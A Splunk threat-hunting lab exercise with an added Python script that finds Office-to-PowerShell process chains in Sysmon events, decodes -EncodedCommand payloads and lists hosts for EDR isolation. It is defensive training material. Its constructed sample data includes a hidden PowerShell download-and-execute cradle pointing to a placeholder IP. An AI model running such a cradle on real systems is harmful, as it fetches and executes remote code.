Splunk App for Enterprise Security · v7.3.0
DAY 6 LAB · LAB 6 — HUNT OFFICE → POWERSHELL · week 1
Hunt Office processes spawning shells: the Sysmon EventCode=1 (process creation) macro chain.
- Run the pre-loaded SPL: Sysmon EventCode=1 events whose parent is winword.exe, excel.exe or outlook.exe and whose child is powershell.exe or cmd.exe.
- Decode any -enc (EncodedCommand) base64 payload; the decoded bytes are UTF-16LE, not UTF-8.
- Recommend EDR isolation of the affected hosts.
Hint: winword.exe → powershell.exe with -enc is textbook macro malware.
Supported SPL in this lab: search field=value (wildcards) · stats count by f1,f2 · where field op N · sort -field · top N field · head N · table f1 f2
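The lab's pre-loaded SPL is not reproduced in this capture, and the SPL subset above has no base64 or UTF-16LE decoding, so the decode step has to happen outside Splunk. The following Python is an added example (not code from the lab, from Splunk, or from Sysmon) that runs the same hunt over a handful of constructed Sysmon EventCode=1 records: it matches Office parents to shell children, pulls every -EncodedCommand blob (including the -e and -ec abbreviations powershell.exe accepts), decodes it as base64-wrapped UTF-16LE, and produces the host list for EDR isolation. Field names follow Sysmon's Event ID 1 schema; the host names, the download cradle, the 198.51.100.x address and the `ps_encode` helper used to build the sample data are assumptions for illustration only.

```python
"""Office -> shell hunt over Sysmon EventCode=1 records with -EncodedCommand decoding.

Added example for this lab, not code from the lab, Splunk or Sysmon. Field names follow
Sysmon's Event ID 1 schema (Computer, ParentImage, Image, CommandLine); the records in
SAMPLE_EVENTS are constructed for illustration and are not real telemetry.
"""
import base64
import ntpath
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match all of them rather than only the literal "-enc" from the lab hint.
_ENC_PREFIXES = sorted({"e", "ec"} | {"encodedcommand"[:n] for n in range(2, 15)},
                       key=len, reverse=True)
ENC_RE = re.compile(r"(?i)(?<!\S)[-/](?:" + "|".join(_ENC_PREFIXES) + r")\s+([A-Za-z0-9+/=]+)")


def image_name(path):
    """Lower-cased file name of a Windows image path (Sysmon logs full paths)."""
    return ntpath.basename(path).lower()


def is_office_to_shell(event):
    """True when an Office process spawned a command interpreter."""
    return (event.get("EventCode") == 1
            and image_name(event.get("ParentImage", "")) in OFFICE_PARENTS
            and image_name(event.get("Image", "")) in SHELL_CHILDREN)


def extract_encoded(command_line):
    """All base64 blobs passed to -EncodedCommand (or an abbreviation) on the command line."""
    return ENC_RE.findall(command_line or "")


def decode_encoded_command(blob):
    """Decode an -EncodedCommand blob: base64 wrapping UTF-16LE text, not UTF-8.

    Returns None when the blob is not valid base64 or not an even number of bytes,
    which is how a truncated or tampered command line shows up.
    """
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(events):
    """One finding per Office->shell event, with every -enc blob decoded (None if undecodable)."""
    findings = []
    for ev in events:
        if not is_office_to_shell(ev):
            continue
        cmdline = ev.get("CommandLine", "")
        findings.append({
            "Computer": ev.get("Computer"),
            "Parent": image_name(ev["ParentImage"]),
            "Child": image_name(ev["Image"]),
            "CommandLine": cmdline,
            "Decoded": [decode_encoded_command(b) for b in extract_encoded(cmdline)],
        })
    return findings


def hosts_to_isolate(findings):
    """Distinct hosts with a confirmed Office->shell chain: the EDR isolation list."""
    return sorted({f["Computer"] for f in findings if f["Computer"]})


def ps_encode(command):
    """Encode a command the way powershell.exe expects it; used only to build sample data."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample records (hypothetical hosts; 198.51.100.0/24 is a documentation range).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/a.txt')"
SAMPLE_EVENTS = [
    {"EventCode": 1, "Computer": "WS-017",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc " + ps_encode(CRADLE)},
    {"EventCode": 1, "Computer": "WS-042",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     # abbreviated flag one level deeper; dwBoAG8AYQBtAGkA is UTF-16LE "whoami"
     "CommandLine": "cmd.exe /c powershell -e dwBoAG8AYQBtAGkA"},
    {"EventCode": 1, "Computer": "WS-042",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     # "Zm9v" is 3 bytes after base64, not valid UTF-16LE: decodes to None
     "CommandLine": 'cmd.exe /c "powershell -ec Zm9v"'},
    {"EventCode": 1, "Computer": "WS-103",
     "ParentImage": r"C:\Windows\explorer.exe",  # user-launched, must not match
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -enc " + ps_encode("Get-Date")},
]

if __name__ == "__main__":
    results = hunt(SAMPLE_EVENTS)
    for f in results:
        print(f"{f['Computer']}: {f['Parent']} -> {f['Child']}")
        for blob, text in zip(extract_encoded(f["CommandLine"]), f["Decoded"]):
            print("   -enc", blob[:24] + "...", "=>", text if text is not None else "<undecodable>")
    print("Isolate via EDR:", ", ".join(hosts_to_isolate(results)))
```

Within the SPL subset this lab supports, the Splunk side of the same hunt is a search along the lines of `EventCode=1 ParentImage=*winword.exe Image=*powershell.exe | table Computer ParentImage Image CommandLine` (an assumed shape, not the lab's actual pre-loaded search); the `table` output is what you would feed to the decoder above. The explorer.exe record is there deliberately: a user running an encoded script is noise for this hunt, and the parent filter is what keeps it out.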